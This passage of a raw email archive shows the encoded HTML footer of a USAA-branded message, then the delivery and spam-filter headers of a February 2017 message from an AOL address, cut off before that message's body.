SIZE: 10px; COLOR: rgb(0,0,0); LINE-HEIGHT: 18px" face=3D"Verdana, sans-ser=
if"><A style=3D"COLOR: rgb(17,85,204)" href=3D"https://www.usaa.com/inet/en=
t_logon/Logon?EID=3D88183-1008_head" target=3D_blank data-saferedirecturl=
=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps://www.usaa.com/inet/en=
t_logon/Logon?EID%3D88183-1008_head&amp;source=3Dgmail&amp;ust=3D1466158300=
263000&amp;usg=3DAFQjCNFwbJ1tFNqqDj9wXNXL0ycI4a942w"><IMG class=3DCToWUd bo=
rder=3D0 alt=3D"" src=3D"https://ci4.googleusercontent.com/proxy/trwGUZiiRP=
lCls9ZRgDdcFNdCsQUVq2NYMciY5ip3h0XB9jZhKrySGUcxF5hbwyVwbKHgGPSFDnO8EAeR5gkR=
XvmVqqC7UMAclJeMLhmZMfVUmxb2Zfnh_wzBgJ6ax3G5-UbIXcOtw=3Ds0-d-e1-ft#http://c=
ontent.usaa.com/mcontent/static_assets/om/Media/SENDS_USAA_COLOR_LOGO.jpg" =
width=3D73 height=3D80></A>
<DIV align=3Dcenter>We know what it means to serve<SPAN class=3DApple-conve=
rted-space>&nbsp;</SPAN><SUP>=AE</SUP><SPAN class=3DApple-converted-space>&=
nbsp;</SPAN><BR>Insurance&nbsp;&nbsp;Banking&nbsp;&nbsp;<WBR>Investments&nb=
sp;&nbsp;Retirement&nbsp;&nbsp;<WBR>Advice</DIV><BR>
<DIV align=3Dright>88183-1008&nbsp;&nbsp;</DIV><BR></FONT></FONT></TD></TR>=
</TBODY></TABLE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#ffffff=
 width=3D5>&nbsp;</TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" width=3D20>&nbsp;=
</TD></TR>
<TR height=3D25>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" colSpan=3D5></TD>=
</TR></TBODY></TABLE></BODY></HTML>
--===============0493653705==--

From jose@monkey.org Mon Feb 13 15:50:17 2017 +0000
Return-Path: aloisa@aol.com
Delivered-To: jose@monkey.org
X-FDA: 72512004474.25.eye09_288d609cd847
X-Spam-Summary: 80,2,0,7fadc808c0bd842a,d41d8cd98f00b204,aloisa@aol.com,,RULES_HIT:41:72:152:355:379:387:541:582:936:938:967:973:983:988:989:1152:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1437:1516:1517:1518:1533:1534:1538:1575:1594:1699:1711:1714:1730:1748:1777:1792:2198:2199:2525:2560:2563:2682:2685:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3635:3873:3876:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:5007:6261:6653:8518:8603:8634:8885:9025:9388:9873:10010:10049:10346:10400:11658:11850:11914:12043:12225:12517:12519:13095:13139:13237:14181:14659:14721:14849:21433:21444:21451:21497:30054:30069,0,RBL:204.29.186.110-irl.urbl.hostedemail.com-127.0.0.150,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:76,LUA_SUMMARY:none
X-HE-Tag: eye09_288d609cd847
X-Filterd-Recvd-Size: 2810
Received: from oms-m014e.mx.aol.com (oms-m014e.mx.aol.com [204.29.186.110])
	by imf21.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 13 Feb 2017 15:50:17 +0000 (UTC)
Received: from omr-m005e.mx.aol.com (omr-m005.mx.aol.com [10.74.133.101])
	(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by oms-m014e.mx.aol.com (AOL Outbound OMS Interface) with ESMTPS id B605F380007A
	for <jose@monkey.org>; Mon, 13 Feb 2017 10:50:16 -0500 (EST)
Received: from mtaomg-mbd02.mx.aol.com (mtaomg-mbd02.mx.aol.com [172.26.252.16])
	by omr-m005e.mx.aol.com (Outbound Mail Relay) with ESMTP id 93BBC38000BA;
	Mon, 13 Feb 2017 10:50:16 -0500 (EST)
Received: from core-max08b.mail.aol.com (core-max08.mail.aol.com [10.73.17.129])
	by mtaomg-mbd02.mx.aol.com (OMAG/Core Interface) with ESMTP id 57DAF38000082;
	Mon, 13 Feb 2017 10:50:12 -0500 (EST)
Received: from 207.244.86.197 by webprd-m83.mail.aol.com (10.74.71.86) with HTTP (WebMailUI); Mon, 13 Feb 2017 10:50:12 -0500
Date: Mon, 13 Feb 2017 10:50:12 -0500
